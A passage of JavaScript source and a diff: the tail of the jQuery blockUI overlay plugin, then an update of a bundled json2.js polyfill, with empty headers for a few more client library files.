 					message: $m,
 					fadeIn : typeof opts.fadeIn  !== 'undefined' ? opts.fadeIn  : 700,
 					fadeOut: typeof opts.fadeOut !== 'undefined' ? opts.fadeOut : 1000,
 					timeout: typeof opts.timeout !== 'undefined' ? opts.timeout : timeout,
 					centerY: false,
 					showOverlay: false,
 					onUnblock: onClose,
 					css: $.blockUI.defaults.growlCSS
 				});
 			};
 			callBlock();
 			var nonmousedOpacity = $m.css('opacity');
 			$m.mouseover(function() {
 				callBlock({
 					fadeIn: 0,
 					timeout: 30000
 				});
 				var displayBlock = $('.blockMsg');
 				displayBlock.stop(); // cancel fadeout if it has started
 				displayBlock.fadeTo(300, 1); // make it easier to read the message by removing transparency
 			}).mouseout(function() {
 				$('.blockMsg').fadeOut(1000);
 			});
 			// End konapun additions
 		};
 		// plugin method for blocking element content
 		$.fn.block = function(opts) {
 			if ( this[0] === window ) {
 				$.blockUI( opts );
 				return this;
 			}
 			var fullOpts = $.extend({}, $.blockUI.defaults, opts || {});
 			this.each(function() {
 				var $el = $(this);
 				if (fullOpts.ignoreIfBlocked && $el.data('blockUI.isBlocked'))
 					return;
 				$el.unblock({ fadeOut: 0 });
 			});
 			return this.each(function() {
 				if ($.css(this,'position') == 'static') {
 					this.style.position = 'relative';
 					$(this).data('blockUI.static', true);
 				}
 				this.style.zoom = 1; // force 'hasLayout' in ie
 				install(this, opts);
 			});
 		};
 		// plugin method for unblocking element content
 		$.fn.unblock = function(opts) {
 			if ( this[0] === window ) {
 				$.unblockUI( opts );
 				return this;
 			}
 			return this.each(function() {
 				remove(this, opts);
 			});
 		};
 		$.blockUI.version = 2.70; // 2nd generation blocking at no extra cost!
 		// override these in your code to change the default behavior and style
 		$.blockUI.defaults = {
 			// message displayed when blocking (use null for no message)
 			message:  '<h1>Please wait...</h1>',
 			title: null,		// title string; only used when theme == true
 			draggable: true,	// only used when theme == true (requires jquery-ui.js to be loaded)
 			theme: false, // set to true to use with jQuery UI themes
 			// styles for the message when blocking; if you wish to disable
 			// these and use an external stylesheet then do this in your code:
 			// $.blockUI.defaults.css = {};
 			css: {
 				padding:	0,
 				margin:		0,
 				width:		'30%',
 				top:		'40%',
 				left:		'35%',
 				textAlign:	'center',
 				color:		'#000',
 				border:		'3px solid #aaa',
 				backgroundColor:'#fff',
 				cursor:		'wait'
 			},
 			// minimal style set used when themes are used
 			themedCSS: {
 				width:	'30%',
 				top:	'40%',
 				left:	'35%'
 			},
 			// styles for the overlay
 			overlayCSS:  {
 				backgroundColor:	'#000',
 				opacity:			0.6,
 				cursor:				'wait'
 			},
 			// style to replace wait cursor before unblocking to correct issue
 			// of lingering wait cursor
 			cursorReset: 'default',
 			// styles applied when using $.growlUI
 			growlCSS: {
 				width:		'350px',
 				top:		'10px',
 				left:		'',
 				right:		'10px',
 				border:		'none',
 				padding:	'5px',
 				opacity:	0.6,
 				cursor:		'default',
 				color:		'#fff',
 				backgroundColor: '#000',
 				'-webkit-border-radius':'10px',
 				'-moz-border-radius':	'10px',
 				'border-radius':		'10px'
 			},
 			// IE issues: 'about:blank' fails on HTTPS and javascript:false is s-l-o-w
 			// (hat tip to Jorge H. N. de Vasconcelos)
 			/*jshint scripturl:true */
 			iframeSrc: /^https/i.test(window.location.href || '') ? 'javascript:false' : 'about:blank',
 			// force usage of iframe in non-IE browsers (handy for blocking applets)
 			forceIframe: false,
 			// z-index for the blocking overlay
 			baseZ: 1000,
 			// set these to true to have the message automatically centered
 			centerX: true, // <-- only effects element blocking (page block controlled via css above)
 			centerY: true,
 			// allow body element to be stetched in ie6; this makes blocking look better
 			// on "short" pages.  disable if you wish to prevent changes to the body height
 			allowBodyStretch: true,
 			// enable if you want key and mouse events to be disabled for content that is blocked
 			bindEvents: true,
 			// be default blockUI will supress tab navigation from leaving blocking content
 			// (if bindEvents is true)
 			constrainTabKey: true,
 			// fadeIn time in millis; set to 0 to disable fadeIn on block
 			fadeIn:  200,
 			// fadeOut time in millis; set to 0 to disable fadeOut on unblock
 			fadeOut:  400,
 			// time in millis to wait before auto-unblocking; set to 0 to disable auto-unblock
 			timeout: 0,
 			// disable if you don't want to show the overlay
 			showOverlay: true,
 			// if true, focus will be placed in the first available input field when
 			// page blocking
 			focusInput: true,
            // elements that can receive focus
            focusableElements: ':input:enabled:visible',
 			// suppresses the use of overlay styles on FF/Linux (due to performance issues with opacity)
 			// no longer needed in 2012
 			// applyPlatformOpacityRules: true,
 			// callback method invoked when fadeIn has completed and blocking message is visible
 			onBlock: null,
 			// callback method invoked when unblocking has completed; the callback is
 			// passed the element that has been unblocked (which is the window object for page
 			// blocks) and the options that were passed to the unblock call:
 			//	onUnblock(element, options)
 			onUnblock: null,
 			// callback method invoked when the overlay area is clicked.
 			// setting this will turn the cursor to a pointer, otherwise cursor defined in overlayCss will be used.
 			onOverlayClick: null,
 			// don't ask; if you really must know: http://groups.google.com/group/jquery-en/browse_thread/thread/36640a8730503595/2f6a79a77a78e493#2f6a79a77a78e493
 			quirksmodeOffsetHack: 4,
 			// class name of the message block
 			blockMsgClass: 'blockMsg',
 			// if it is already blocked, then ignore it (don't unblock and reblock)
 			ignoreIfBlocked: false
 		};
 		// private data and functions follow...
 		var pageBlock = null;
 		var pageBlockEls = [];
 		function install(el, opts) {
 			var css, themedCSS;
 			var full = (el == window);
 			var msg = (opts && opts.message !== undefined ? opts.message : undefined);
 			opts = $.extend({}, $.blockUI.defaults, opts || {});
 			if (opts.ignoreIfBlocked && $(el).data('blockUI.isBlocked'))
 				return;
 			opts.overlayCSS = $.extend({}, $.blockUI.defaults.overlayCSS, opts.overlayCSS || {});
 			css = $.extend({}, $.blockUI.defaults.css, opts.css || {});
 			if (opts.onOverlayClick)
 				opts.overlayCSS.cursor = 'pointer';
 			themedCSS = $.extend({}, $.blockUI.defaults.themedCSS, opts.themedCSS || {});
 			msg = msg === undefined ? opts.message : msg;
 			// remove the current block (if there is one)
 			if (full && pageBlock)
 				remove(window, {fadeOut:0});
 			// if an existing element is being used as the blocking content then we capture
 			// its current place in the DOM (and current display style) so we can restore
 			// it when we unblock
 			if (msg && typeof msg != 'string' && (msg.parentNode || msg.jquery)) {
 				var node = msg.jquery ? msg[0] : msg;
 				var data = {};
 				$(el).data('blockUI.history', data);
 				data.el = node;
 				data.parent = node.parentNode;
 				data.display = node.style.display;
 				data.position = node.style.position;
 				if (data.parent)
 					data.parent.removeChild(node);
 			}
 			$(el).data('blockUI.onUnblock', opts.onUnblock);
 			var z = opts.baseZ;
 			// blockUI uses 3 layers for blocking, for simplicity they are all used on every platform;
 			// layer1 is the iframe layer which is used to supress bleed through of underlying content
 			// layer2 is the overlay layer which has opacity and a wait cursor (by default)
 			// layer3 is the message content that is displayed while blocking
 			var lyr1, lyr2, lyr3, s;
 			if (msie || opts.forceIframe)
 				lyr1 = $('<iframe class="blockUI" style="z-index:'+ (z++) +';display:none;border:none;margin:0;padding:0;position:absolute;width:100%;height:100%;top:0;left:0" src="'+opts.iframeSrc+'"></iframe>');
 			else
 				lyr1 = $('<div class="blockUI" style="display:none"></div>');
 			if (opts.theme)
 				lyr2 = $('<div class="blockUI blockOverlay ui-widget-overlay" style="z-index:'+ (z++) +';display:none"></div>');
 			else
 				lyr2 = $('<div class="blockUI blockOverlay" style="z-index:'+ (z++) +';display:none;border:none;margin:0;padding:0;width:100%;height:100%;top:0;left:0"></div>');
 			if (opts.theme && full) {
 				s = '<div class="blockUI ' + opts.blockMsgClass + ' blockPage ui-dialog ui-widget ui-corner-all" style="z-index:'+(z+10)+';display:none;position:fixed">';
 				if ( opts.title ) {
 					s += '<div class="ui-widget-header ui-dialog-titlebar ui-corner-all blockTitle">'+(opts.title || '&nbsp;')+'</div>';
 				}
 				s += '<div class="ui-widget-content ui-dialog-content"></div>';
 				s += '</div>';
 			}
 			else if (opts.theme) {
 				s = '<div class="blockUI ' + opts.blockMsgClass + ' blockElement ui-dialog ui-widget ui-corner-all" style="z-index:'+(z+10)+';display:none;position:absolute">';
 				if ( opts.title ) {
 					s += '<div class="ui-widget-header ui-dialog-titlebar ui-corner-all blockTitle">'+(opts.title || '&nbsp;')+'</div>';
 				}
 				s += '<div class="ui-widget-content ui-dialog-content"></div>';
 				s += '</div>';
 			}
 			else if (full) {
 				s = '<div class="blockUI ' + opts.blockMsgClass + ' blockPage" style="z-index:'+(z+10)+';display:none;position:fixed"></div>';
 			}
 			else {
 				s = '<div class="blockUI ' + opts.blockMsgClass + ' blockElement" style="z-index:'+(z+10)+';display:none;position:absolute"></div>';
 			}
 			lyr3 = $(s);
 			// if we have a message, style it
 			if (msg) {
 				if (opts.theme) {
 					lyr3.css(themedCSS);
 					lyr3.addClass('ui-widget-content');
 				}
 				else
 					lyr3.css(css);
 			}
 			// style the overlay
 			if (!opts.theme /*&& (!opts.applyPlatformOpacityRules)*/)
 				lyr2.css(opts.overlayCSS);
 			lyr2.css('position', full ? 'fixed' : 'absolute');
 			// make iframe layer transparent in IE
 			if (msie || opts.forceIframe)
 				lyr1.css('opacity',0.0);
 			//$([lyr1[0],lyr2[0],lyr3[0]]).appendTo(full ? 'body' : el);
 			var layers = [lyr1,lyr2,lyr3], $par = full ? $('body') : $(el);
 			$.each(layers, function() {
 				this.appendTo($par);
 			});
 			if (opts.theme && opts.draggable && $.fn.draggable) {
 				lyr3.draggable({
 					handle: '.ui-dialog-titlebar',
 					cancel: 'li'
 				});
 			}
 			// ie7 must use absolute positioning in quirks mode and to account for activex issues (when scrolling)
 			var expr = setExpr && (!$.support.boxModel || $('object,embed', full ? null : el).length > 0);
 			if (ie6 || expr) {
 				// give body 100% height
 				if (full && opts.allowBodyStretch && $.support.boxModel)
 					$('html,body').css('height','100%');
 				// fix ie6 issue when blocked element has a border width
 				if ((ie6 || !$.support.boxModel) && !full) {
 					var t = sz(el,'borderTopWidth'), l = sz(el,'borderLeftWidth');
 					var fixT = t ? '(0 - '+t+')' : 0;
 					var fixL = l ? '(0 - '+l+')' : 0;
 				}
 				// simulate fixed position
 				$.each(layers, function(i,o) {
 					var s = o[0].style;
 					s.position = 'absolute';
 					if (i < 2) {
 						if (full)
 							s.setExpression('height','Math.max(document.body.scrollHeight, document.body.offsetHeight) - (jQuery.support.boxModel?0:'+opts.quirksmodeOffsetHack+') + "px"');
 						else
 							s.setExpression('height','this.parentNode.offsetHeight + "px"');
 						if (full)
 							s.setExpression('width','jQuery.support.boxModel && document.documentElement.clientWidth || document.body.clientWidth + "px"');
 						else
 							s.setExpression('width','this.parentNode.offsetWidth + "px"');
 						if (fixL) s.setExpression('left', fixL);
 						if (fixT) s.setExpression('top', fixT);
 					}
 					else if (opts.centerY) {
 						if (full) s.setExpression('top','(document.documentElement.clientHeight || document.body.clientHeight) / 2 - (this.offsetHeight / 2) + (blah = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + "px"');
 						s.marginTop = 0;
 					}
 					else if (!opts.centerY && full) {
 						var top = (opts.css && opts.css.top) ? parseInt(opts.css.top, 10) : 0;
 						var expression = '((document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + '+top+') + "px"';
 						s.setExpression('top',expression);
 					}
 				});
 			}
 			// show the message
 			if (msg) {
 				if (opts.theme)
 					lyr3.find('.ui-widget-content').append(msg);
 				else
 					lyr3.append(msg);
 				if (msg.jquery || msg.nodeType)
 					$(msg).show();
 			}
 			if ((msie || opts.forceIframe) && opts.showOverlay)
 				lyr1.show(); // opacity is zero
 			if (opts.fadeIn) {
 				var cb = opts.onBlock ? opts.onBlock : noOp;
 				var cb1 = (opts.showOverlay && !msg) ? cb : noOp;
 				var cb2 = msg ? cb : noOp;
 				if (opts.showOverlay)
 					lyr2._fadeIn(opts.fadeIn, cb1);
 				if (msg)
 					lyr3._fadeIn(opts.fadeIn, cb2);
 			}
 			else {
 				if (opts.showOverlay)
 					lyr2.show();
 				if (msg)
 					lyr3.show();
 				if (opts.onBlock)
 					opts.onBlock.bind(lyr3)();
 			}
 			// bind key and mouse events
 			bind(1, el, opts);
 			if (full) {
 				pageBlock = lyr3[0];
 				pageBlockEls = $(opts.focusableElements,pageBlock);
 				if (opts.focusInput)
 					setTimeout(focus, 20);
 			}
 			else
 				center(lyr3[0], opts.centerX, opts.centerY);
 			if (opts.timeout) {
 				// auto-unblock
 				var to = setTimeout(function() {
 					if (full)
 						$.unblockUI(opts);
 					else
 						$(el).unblock(opts);
 				}, opts.timeout);
 				$(el).data('blockUI.timeout', to);
 			}
 		}
 		// remove the block
 		function remove(el, opts) {
 			var count;
 			var full = (el == window);
 			var $el = $(el);
 			var data = $el.data('blockUI.history');
 			var to = $el.data('blockUI.timeout');
 			if (to) {
 				clearTimeout(to);
 				$el.removeData('blockUI.timeout');
 			}
 			opts = $.extend({}, $.blockUI.defaults, opts || {});
 			bind(0, el, opts); // unbind events
 			if (opts.onUnblock === null) {
 				opts.onUnblock = $el.data('blockUI.onUnblock');
 				$el.removeData('blockUI.onUnblock');
 			}
 			var els;
 			if (full) // crazy selector to handle odd field errors in ie6/7
 				els = $('body').children().filter('.blockUI').add('body > .blockUI');
 			else
 				els = $el.find('>.blockUI');
 			// fix cursor issue
 			if ( opts.cursorReset ) {
 				if ( els.length > 1 )
 					els[1].style.cursor = opts.cursorReset;
 				if ( els.length > 2 )
 					els[2].style.cursor = opts.cursorReset;
 			}
 			if (full)
 				pageBlock = pageBlockEls = null;
 			if (opts.fadeOut) {
 				count = els.length;
 				els.stop().fadeOut(opts.fadeOut, function() {
 					if ( --count === 0)
 						reset(els,data,opts,el);
 				});
 			}
 			else
 				reset(els, data, opts, el);
 		}
 		// move blocking element back into the DOM where it started
 		function reset(els,data,opts,el) {
 			var $el = $(el);
 			if ( $el.data('blockUI.isBlocked') )
 				return;
 			els.each(function(i,o) {
 				// remove via DOM calls so we don't lose event handlers
 				if (this.parentNode)
 					this.parentNode.removeChild(this);
 			});
 			if (data && data.el) {
 				data.el.style.display = data.display;
 				data.el.style.position = data.position;
 				data.el.style.cursor = 'default'; // #59
 				if (data.parent)
 					data.parent.appendChild(data.el);
 				$el.removeData('blockUI.history');
 			}
 			if ($el.data('blockUI.static')) {
 				$el.css('position', 'static'); // #22
 			}
 			if (typeof opts.onUnblock == 'function')
 				opts.onUnblock(el,opts);
 			// fix issue in Safari 6 where block artifacts remain until reflow
 			var body = $(document.body), w = body.width(), cssW = body[0].style.width;
 			body.width(w-1).width(w);
 			body[0].style.width = cssW;
 		}
 		// bind/unbind the handler
 		function bind(b, el, opts) {
 			var full = el == window, $el = $(el);
 			// don't bother unbinding if there is nothing to unbind
 			if (!b && (full && !pageBlock || !full && !$el.data('blockUI.isBlocked')))
 				return;
 			$el.data('blockUI.isBlocked', b);
 			// don't bind events when overlay is not in use or if bindEvents is false
 			if (!full || !opts.bindEvents || (b && !opts.showOverlay))
 				return;
 			// bind anchors and inputs for mouse and key events
 			var events = 'mousedown mouseup keydown keypress keyup touchstart touchend touchmove';
 			if (b)
 				$(document).bind(events, opts, handler);
 			else
 				$(document).unbind(events, handler);
 		// former impl...
 		//		var $e = $('a,:input');
 		//		b ? $e.bind(events, opts, handler) : $e.unbind(events, handler);
 		}
 		// event handler to suppress keyboard/mouse events when blocking
 		function handler(e) {
 			// allow tab navigation (conditionally)
 			if (e.type === 'keydown' && e.keyCode && e.keyCode == 9) {
 				if (pageBlock && e.data.constrainTabKey) {
 					var els = pageBlockEls;
 					var fwd = !e.shiftKey && e.target === els[els.length-1];
 					var back = e.shiftKey && e.target === els[0];
 					if (fwd || back) {
 						setTimeout(function(){focus(back);},10);
 						return false;
 					}
 				}
 			}
 			var opts = e.data;
 			var target = $(e.target);
 			if (target.hasClass('blockOverlay') && opts.onOverlayClick)
 				opts.onOverlayClick(e);
 			// allow events within the message content
 			if (target.parents('div.' + opts.blockMsgClass).length > 0)
 				return true;
 			// allow events for content that is not being blocked
 			return target.parents().children().filter('div.blockUI').length === 0;
 		}
 		function focus(back) {
 			if (!pageBlockEls)
 				return;
 			var e = pageBlockEls[back===true ? pageBlockEls.length-1 : 0];
 			if (e)
 				e.focus();
 		}
 		function center(el, x, y) {
 			var p = el.parentNode, s = el.style;
 			var l = ((p.offsetWidth - el.offsetWidth)/2) - sz(p,'borderLeftWidth');
 			var t = ((p.offsetHeight - el.offsetHeight)/2) - sz(p,'borderTopWidth');
 			if (x) s.left = l > 0 ? (l+'px') : '0';
 			if (y) s.top  = t > 0 ? (t+'px') : '0';
 		}
 		function sz(el, p) {
 			return parseInt($.css(el,p),10)||0;
 		}
 	}
 	/*global define:true */
 	if (typeof define === 'function' && define.amd && define.amd.jQuery) {
 		define(['jquery'], setup);
 	} else {
 		setup(jQuery);
 	}
 })();
--- a/core/main/client/lib/json2.js
+++ b/core/main/client/lib/json2.js
@@ -1,58 +1,70 @@
-/*
+//  json2.js
-    https://github.com/douglascrockford/JSON-js/blob/master/json2.js
+//  2016-10-28
-    2011-02-23
+//  Public Domain.
 //  NO WARRANTY EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
 //  See http://www.JSON.org/js.html
 //  This code should be minified before deployment.
 //  See http://javascript.crockford.com/jsmin.html
 //  USE YOUR OWN COPY. IT IS EXTREMELY UNWISE TO LOAD CODE FROM SERVERS YOU DO
 //  NOT CONTROL.
 //  This file creates a global JSON object containing two methods: stringify
 //  and parse. This file provides the ES5 JSON capability to ES3 systems.
 //  If a project might run on IE8 or earlier, then this file should be included.
 //  This file does nothing on ES5 systems.
 // Create a JSON object only if one does not already exist. We create the
 // methods in a closure to avoid creating global variables.
 */
-var JSON;
+if (typeof JSON !== "object") {
 if (!JSON) {
    JSON = {};
 }
 (function () {
    "use strict";
    var rx_one = /^[\],:{}\s]*$/;
    var rx_two = /\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g;
    var rx_three = /"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g;
    var rx_four = /(?:^|:|,)(?:\s*\[)+/g;
    var rx_escapable = /[\\"\u0000-\u001f\u007f-\u009f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g;
    var rx_dangerous = /[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g;
    function f(n) {
        // Format integers to have at least two digits.
-        return n < 10 ? '0' + n : n;
+        return n < 10
            ? "0" + n
            : n;
    }
-    if (typeof Date.prototype.toJSON !== 'function') {
+    function this_value() {
        return this.valueOf();
    }
-        Date.prototype.toJSON = function (key) {
+    if (typeof Date.prototype.toJSON !== "function") {
-            return isFinite(this.valueOf()) ?
+        Date.prototype.toJSON = function () {
-                this.getUTCFullYear()     + '-' +
+
-                f(this.getUTCMonth() + 1) + '-' +
+            return isFinite(this.valueOf())
-                f(this.getUTCDate())      + 'T' +
+                ? this.getUTCFullYear() + "-" +
-                f(this.getUTCHours())     + ':' +
+                        f(this.getUTCMonth() + 1) + "-" +
-                f(this.getUTCMinutes())   + ':' +
+                        f(this.getUTCDate()) + "T" +
-                f(this.getUTCSeconds())   + 'Z' : null;
+                        f(this.getUTCHours()) + ":" +
                        f(this.getUTCMinutes()) + ":" +
                        f(this.getUTCSeconds()) + "Z"
                : null;
        };
-        String.prototype.toJSON      =
+        Boolean.prototype.toJSON = this_value;
-            Number.prototype.toJSON  =
+        Number.prototype.toJSON = this_value;
-            Boolean.prototype.toJSON = function (key) {
+        String.prototype.toJSON = this_value;
                return this.valueOf();
            };
    }
-    var cx = /[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,
+    var gap;
-        escapable = /[\\\"\x00-\x1f\x7f-\x9f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,
+    var indent;
-        gap,
+    var meta;
-        indent,
+    var rep;
        meta = {    // table of character substitutions
            '\b': '\\b',
            '\t': '\\t',
            '\n': '\\n',
            '\f': '\\f',
            '\r': '\\r',
            '"' : '\\"',
            '\\': '\\\\'
        },
        rep;
    function quote(string) {
@@ -62,12 +74,15 @@ if (!JSON) {
 // Otherwise we must also replace the offending characters with safe escape
 // sequences.
-        escapable.lastIndex = 0;
+        rx_escapable.lastIndex = 0;
-        return escapable.test(string) ? '"' + string.replace(escapable, function (a) {
+        return rx_escapable.test(string)
-            var c = meta[a];
+            ? "\"" + string.replace(rx_escapable, function (a) {
-            return typeof c === 'string' ? c :
+                var c = meta[a];
-                '\\u' + ('0000' + a.charCodeAt(0).toString(16)).slice(-4);
+                return typeof c === "string"
-        }) + '"' : '"' + string + '"';
+                    ? c
                    : "\\u" + ("0000" + a.charCodeAt(0).toString(16)).slice(-4);
            }) + "\""
            : "\"" + string + "\"";
    }
@@ -75,59 +90,61 @@ if (!JSON) {
 // Produce a string from holder[key].
-        var i,          // The loop counter.
+        var i;          // The loop counter.
-            k,          // The member key.
+        var k;          // The member key.
-            v,          // The member value.
+        var v;          // The member value.
-            length,
+        var length;
-            mind = gap,
+        var mind = gap;
-            partial,
+        var partial;
-            value = holder[key];
+        var value = holder[key];
 // If the value has a toJSON method, call it to obtain a replacement value.
-        if (value && typeof value === 'object' &&
+        if (value && typeof value === "object" &&
-                typeof value.toJSON === 'function') {
+                typeof value.toJSON === "function") {
            value = value.toJSON(key);
        }
 // If we were called with a replacer function, then call the replacer to
 // obtain a replacement value.
-        if (typeof rep === 'function') {
+        if (typeof rep === "function") {
            value = rep.call(holder, key, value);
        }
 // What happens next depends on the value's type.
        switch (typeof value) {
-        case 'string':
+        case "string":
            return quote(value);
-        case 'number':
+        case "number":
 // JSON numbers must be finite. Encode non-finite numbers as null.
-            return isFinite(value) ? String(value) : 'null';
+            return isFinite(value)
                ? String(value)
                : "null";
-        case 'boolean':
+        case "boolean":
-        case 'null':
+        case "null":
 // If the value is a boolean or null, convert it to a string. Note:
-// typeof null does not produce 'null'. The case is included here in
+// typeof null does not produce "null". The case is included here in
 // the remote chance that this gets fixed someday.
            return String(value);
-// If the type is 'object', we might be dealing with an object or an array or
+// If the type is "object", we might be dealing with an object or an array or
 // null.
-        case 'object':
+        case "object":
-// Due to a specification blunder in ECMAScript, typeof null is 'object',
+// Due to a specification blunder in ECMAScript, typeof null is "object",
 // so watch out for that case.
            if (!value) {
-                return 'null';
+                return "null";
            }
 // Make an array to hold the partial results of stringifying this object value.
@@ -137,36 +154,42 @@ if (!JSON) {
 // Is the value an array?
-            if (Object.prototype.toString.apply(value) === '[object Array]') {
+            if (Object.prototype.toString.apply(value) === "[object Array]") {
 // The value is an array. Stringify every element. Use null as a placeholder
 // for non-JSON values.
                length = value.length;
                for (i = 0; i < length; i += 1) {
-                    partial[i] = str(i, value) || 'null';
+                    partial[i] = str(i, value) || "null";
                }
 // Join all of the elements together, separated with commas, and wrap them in
 // brackets.
-                v = partial.length === 0 ? '[]' : gap ?
+                v = partial.length === 0
-                    '[\n' + gap + partial.join(',\n' + gap) + '\n' + mind + ']' :
+                    ? "[]"
-                    '[' + partial.join(',') + ']';
+                    : gap
                        ? "[\n" + gap + partial.join(",\n" + gap) + "\n" + mind + "]"
                        : "[" + partial.join(",") + "]";
                gap = mind;
                return v;
            }
 // If the replacer is an array, use it to select the members to be stringified.
-            if (rep && typeof rep === 'object') {
+            if (rep && typeof rep === "object") {
                length = rep.length;
                for (i = 0; i < length; i += 1) {
-                    if (typeof rep[i] === 'string') {
+                    if (typeof rep[i] === "string") {
                        k = rep[i];
                        v = str(k, value);
                        if (v) {
-                            partial.push(quote(k) + (gap ? ': ' : ':') + v);
+                            partial.push(quote(k) + (
                                gap
                                    ? ": "
                                    : ":"
                            ) + v);
                        }
                    }
                }
@@ -178,7 +201,11 @@ if (!JSON) {
                    if (Object.prototype.hasOwnProperty.call(value, k)) {
                        v = str(k, value);
                        if (v) {
-                            partial.push(quote(k) + (gap ? ': ' : ':') + v);
+                            partial.push(quote(k) + (
                                gap
                                    ? ": "
                                    : ":"
                            ) + v);
                        }
                    }
                }
@@ -187,9 +214,11 @@ if (!JSON) {
 // Join all of the member texts together, separated with commas,
 // and wrap them in braces.
-            v = partial.length === 0 ? '{}' : gap ?
+            v = partial.length === 0
-                '{\n' + gap + partial.join(',\n' + gap) + '\n' + mind + '}' :
+                ? "{}"
-                '{' + partial.join(',') + '}';
+                : gap
                    ? "{\n" + gap + partial.join(",\n" + gap) + "\n" + mind + "}"
                    : "{" + partial.join(",") + "}";
            gap = mind;
            return v;
        }
@@ -197,7 +226,16 @@ if (!JSON) {
 // If the JSON object does not yet have a stringify method, give it one.
-    if (typeof JSON.stringify !== 'function') {
+    if (typeof JSON.stringify !== "function") {
        meta = {    // table of character substitutions
            "\b": "\\b",
            "\t": "\\t",
            "\n": "\\n",
            "\f": "\\f",
            "\r": "\\r",
            "\"": "\\\"",
            "\\": "\\\\"
        };
        JSON.stringify = function (value, replacer, space) {
 // The stringify method takes a value and an optional replacer, and an optional
@@ -207,20 +245,20 @@ if (!JSON) {
 // produce text that is more easily readable.
            var i;
-            gap = '';
+            gap = "";
-            indent = '';
+            indent = "";
 // If the space parameter is a number, make an indent string containing that
 // many spaces.
-            if (typeof space === 'number') {
+            if (typeof space === "number") {
                for (i = 0; i < space; i += 1) {
-                    indent += ' ';
+                    indent += " ";
                }
 // If the space parameter is a string, it will be used as the indent string.
-            } else if (typeof space === 'string') {
+            } else if (typeof space === "string") {
                indent = space;
            }
@@ -228,23 +266,23 @@ if (!JSON) {
 // Otherwise, throw an error.
            rep = replacer;
-            if (replacer && typeof replacer !== 'function' &&
+            if (replacer && typeof replacer !== "function" &&
-                    (typeof replacer !== 'object' ||
+                    (typeof replacer !== "object" ||
-                    typeof replacer.length !== 'number')) {
+                    typeof replacer.length !== "number")) {
-                throw new Error('JSON.stringify');
+                throw new Error("JSON.stringify");
            }
-// Make a fake root object containing our value under the key of ''.
+// Make a fake root object containing our value under the key of "".
 // Return the result of stringifying the value.
-            return str('', {'': value});
+            return str("", {"": value});
        };
    }
 // If the JSON object does not yet have a parse method, give it one.
-    if (typeof JSON.parse !== 'function') {
+    if (typeof JSON.parse !== "function") {
        JSON.parse = function (text, reviver) {
 // The parse method takes a text and an optional reviver function, and returns
@@ -257,8 +295,10 @@ if (!JSON) {
 // The walk method is used to recursively walk the resulting structure so
 // that modifications can be made.
-                var k, v, value = holder[key];
+                var k;
-                if (value && typeof value === 'object') {
+                var v;
                var value = holder[key];
                if (value && typeof value === "object") {
                    for (k in value) {
                        if (Object.prototype.hasOwnProperty.call(value, k)) {
                            v = walk(value, k);
@@ -279,49 +319,54 @@ if (!JSON) {
 // incorrectly, either silently deleting them, or treating them as line endings.
            text = String(text);
-            cx.lastIndex = 0;
+            rx_dangerous.lastIndex = 0;
-            if (cx.test(text)) {
+            if (rx_dangerous.test(text)) {
-                text = text.replace(cx, function (a) {
+                text = text.replace(rx_dangerous, function (a) {
-                    return '\\u' +
+                    return "\\u" +
-                        ('0000' + a.charCodeAt(0).toString(16)).slice(-4);
+                            ("0000" + a.charCodeAt(0).toString(16)).slice(-4);
                });
            }
 // In the second stage, we run the text against regular expressions that look
-// for non-JSON patterns. We are especially concerned with '()' and 'new'
+// for non-JSON patterns. We are especially concerned with "()" and "new"
-// because they can cause invocation, and '=' because it can cause mutation.
+// because they can cause invocation, and "=" because it can cause mutation.
 // But just to be safe, we want to reject all unexpected forms.
 // We split the second stage into 4 regexp operations in order to work around
 // crippling inefficiencies in IE's and Safari's regexp engines. First we
-// replace the JSON backslash pairs with '@' (a non-JSON character). Second, we
+// replace the JSON backslash pairs with "@" (a non-JSON character). Second, we
-// replace all simple value tokens with ']' characters. Third, we delete all
+// replace all simple value tokens with "]" characters. Third, we delete all
 // open brackets that follow a colon or comma or that begin the text. Finally,
-// we look to see that the remaining characters are only whitespace or ']' or
+// we look to see that the remaining characters are only whitespace or "]" or
-// ',' or ':' or '{' or '}'. If that is so, then the text is safe for eval.
+// "," or ":" or "{" or "}". If that is so, then the text is safe for eval.
-            if (/^[\],:{}\s]*$/
+            if (
-                    .test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
+                rx_one.test(
-                        .replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g, ']')
+                    text
-                        .replace(/(?:^|:|,)(?:\s*\[)+/g, ''))) {
+                        .replace(rx_two, "@")
                        .replace(rx_three, "]")
                        .replace(rx_four, "")
                )
            ) {
 // In the third stage we use the eval function to compile the text into a
-// JavaScript structure. The '{' operator is subject to a syntactic ambiguity
+// JavaScript structure. The "{" operator is subject to a syntactic ambiguity
 // in JavaScript: it can begin a block or an object literal. We wrap the text
 // in parens to eliminate the ambiguity.
-                j = eval('(' + text + ')');
+                j = eval("(" + text + ")");
 // In the optional fourth stage, we recursively walk the new structure, passing
 // each name/value pair to a reviver function for possible transformation.
-                return typeof reviver === 'function' ?
+                return (typeof reviver === "function")
-                    walk({'': j}, '') : j;
+                    ? walk({"": j}, "")
                    : j;
            }
 // If the text is not JSON parseable, then a SyntaxError is thrown.
-            throw new SyntaxError('JSON.parse');
+            throw new SyntaxError("JSON.parse");
        };
    }
 }());
--- a/core/main/client/lib/mdetect.js
+++ b/core/main/client/lib/mdetect.js
--- a/core/main/client/lib/platform.js
+++ b/core/main/client/lib/platform.js
--- a/core/main/client/lib/webrtcadapter.js
+++ b/core/main/client/lib/webrtcadapter.js
@@ -0,0 +1,414 @@
 /*
